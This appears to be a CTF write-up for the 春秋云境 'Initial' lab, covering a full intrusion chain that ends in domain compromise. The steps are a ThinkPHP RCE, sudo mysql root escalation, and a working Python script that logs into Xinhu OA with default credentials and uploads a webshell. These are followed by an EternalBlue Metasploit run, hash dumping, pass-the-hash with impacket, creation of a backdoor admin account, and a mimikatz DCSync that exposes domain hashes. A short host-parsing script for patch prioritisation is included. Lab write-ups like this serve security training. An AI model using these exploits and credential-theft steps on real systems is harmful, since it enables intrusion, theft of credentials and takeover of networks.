春秋云境 Initial

flag01

```text
39.99.141.147:80 open
39.99.141.147:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.99.141.147 code:200 len:5578 title:Bootstrap Material Admin
[+] PocScan http://39.99.141.147 poc-yaml-thinkphp5023-method-rce poc1
```

The scan immediately turns up the ThinkPHP hole.

After getting in, we find we are running as www-data.

Privilege escalation via mysql (the mysql client's `\!` runs a shell command, and sudo lets it run as root):

```bash
sudo mysql -e '\! whoami'

sudo mysql -e '\! cat /root/f*/f*'
```

flag02

```text
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
inet 172.22.1.15 netmask 255.255.0.0 broadcast 172.22.255.255
inet6 fe80::216:3eff:fe26:a581 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:26:a5:81 txqueuelen 1000 (Ethernet)
RX packets 134555 bytes 188525088 (188.5 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 56675 bytes 12946270 (12.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
```

```bash
./fs -h 172.22.1.1/24 -o result.txt
```

The results are as follows:

```text
172.22.1.2:88 open
172.22.1.21:139 open
172.22.1.2:139 open
172.22.1.21:135 open
172.22.1.18:139 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.2:135 open
172.22.1.18:135 open
172.22.1.15:22 open
172.22.1.18:3306 open
172.22.1.21:445 open
172.22.1.2:445 open
172.22.1.18:445 open
[*] NetInfo:
[*]172.22.1.2
[->]DC01
[->]172.22.1.2
[*] NetInfo:
[*]172.22.1.18
[->]XIAORANG-OA01
[->]172.22.1.18
[*] WebTitle: http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[*] NetInfo:
[*]172.22.1.21
[->]XIAORANG-WIN7
[->]172.22.1.21
[+] 172.22.1.21 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios: 172.22.1.2 [+]DC DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[*] NetBios: 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] NetBios: 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[*] WebTitle: http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle: http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
```
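The scan output above is line-oriented and mixes port, NetBIOS and vulnerability records, which is awkward to hand to a patching team. The following is an added example, not part of the original writeup: it folds fscan-style output into one record per host and orders the hosts by how urgently they need remediation. The sample lines are constructed to mirror the scan above, and the scoring weights are an assumption.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in fscan's output format, modelled on the scan above.
SAMPLE = """\
172.22.1.2:88 open
172.22.1.21:445 open
172.22.1.18:3306 open
[+] 172.22.1.21 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios: 172.22.1.2 [+]DC DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios: 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle: http://172.22.1.18 code:302 len:0 title:None
[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
"""

@dataclass
class Host:
    ports: set = field(default_factory=set)
    names: set = field(default_factory=set)
    findings: list = field(default_factory=list)

IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
PORT_RE = re.compile(rf"^{IP}:(\d+) open$")
SMB_RE = re.compile(rf"^\[\+\] {IP} (MS\d{{2}}-\d{{3}})")
POC_RE = re.compile(rf"^\[\+\] https?://{IP}\S* (poc-yaml-\S+)")
NB_RE = re.compile(rf"^\[\*\] NetBios: {IP} (?:\[\+\]DC )?(\S+)")

def parse_fscan(text):
    """Fold fscan's line-oriented output into one record per host."""
    hosts = {}
    for line in text.splitlines():
        if m := PORT_RE.match(line):
            hosts.setdefault(m[1], Host()).ports.add(int(m[2]))
        elif m := SMB_RE.match(line) or POC_RE.match(line):
            hosts.setdefault(m[1], Host()).findings.append(m[2])
        elif m := NB_RE.match(line):
            hosts.setdefault(m[1], Host()).names.add(m[2])
    return hosts

def patch_priority(hosts):
    """Order hosts for remediation (assumed weights): wormable SMB bugs
    first, then web RCE PoCs, then the DC, then exposed database ports."""
    def score(ip):
        h = hosts[ip]
        s = sum(20 if f.startswith("MS") else 10 for f in h.findings)
        s += 5 if any(n.startswith("DC") for n in h.names) or 88 in h.ports else 0
        s += 2 if 3306 in h.ports else 0
        return s
    return sorted(hosts, key=score, reverse=True)
```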

Set up a proxy:

```bash
./gost -L=:10000 &
```

Start with the Xinhu OA (信呼协同办公系统) at 172.22.1.18; it has a weak password:

```text
admin/admin123
```

Use the admin-panel upload vulnerability to upload a shell:

```python
# 1.php is the webshell

# The following need to be changed:
# url_pre = 'http://<IP>/'
# 'adminuser': '<ADMINUSER_BASE64>',
# 'adminpass': '<ADMINPASS_BASE64>',

import requests

session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
# url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=<ID>'
data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',      # base64("admin")
    'adminpass': 'YWRtaW4xMjM=',  # base64("admin123")
    'yanzm': ''
}

# Log in to the back end, then upload 1.php through the authenticated upload endpoint
r = session.post(url1, data=data1)
with open('1.php', 'rb') as fh:  # binary mode so the file body is sent unchanged
    r = session.post(url2, files={'file': fh})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
print(filepath)
file_id = r.json()['id']  # renamed from `id` to avoid shadowing the builtin
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={file_id}'
r = session.get(url3)  # run the task that turns the uploaded .uptemp file into .php
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)
```

Remember to write your own 1.php webshell and connect with AntSword (蚁剑).

```text
C:\Users\Administrator\flag> type flag02.txt
```

flag03

172.22.1.21 is vulnerable to MS17-010; just hit it with msf.

```bash
proxychains4 msfconsole 2>/dev/null
```

```text
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
show payloads
set payload payload/windows/x64/meterpreter/bind_tcp
set rhosts 172.22.1.21
run
```

Then wait for the shell.

```text
hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:48f6da83eb89a4da8a1cc963b855a799:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
```

Move laterally with the hash:

```bash
proxychains4 impacket-smbexec -hashes :48f6da83eb89a4da8a1cc963b855a799 ./administrator@172.22.1.21 -codec gbk
```

No flag found there, so add a user and log on with it:

```text
net user Chu0 whoami@666 /add
net localgroup administrators Chu0 /add
```

Collect information with BloodHound.

So dump the domain admin hash directly and move laterally to the DC for its flag.

```text
mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
```

```text
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514
1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512
1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512
1000 DC01$ 075b7ba049ee9b65eb3aea0fb13440e3 532480
500 Administrator 10cf89a850fb1cdbe6bb432b859164c8 512
1104 XIAORANG-OA01$ eca40798d7ca35d5b2f0ecb7217a68a5 4096
1108 XIAORANG-WIN7$ c7631dbcd38dac582e8c891880c40517 4096
```

Lateral movement as domain admin:

```bash
proxychains4 impacket-smbexec -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang.lab/administrator@172.22.1.2 -codec gbk
```

```text
type c:\users\administrator\flag\flag03.txt
```